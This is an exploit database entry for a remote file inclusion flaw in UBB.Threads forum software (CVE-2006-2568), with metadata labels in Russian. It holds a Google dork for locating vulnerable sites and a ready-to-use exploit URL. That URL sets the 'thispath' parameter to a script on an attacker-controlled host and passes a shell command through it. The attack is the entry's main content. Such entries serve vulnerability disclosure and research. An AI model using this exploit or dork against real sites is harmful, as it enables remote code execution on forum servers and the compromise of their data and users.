Exploit UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

[Exploiter]

EDB-ID

1814

Проверка EDB

1. Пройдено

Автор

V4MU

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-2568

Дата публикации

2006-05-22

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]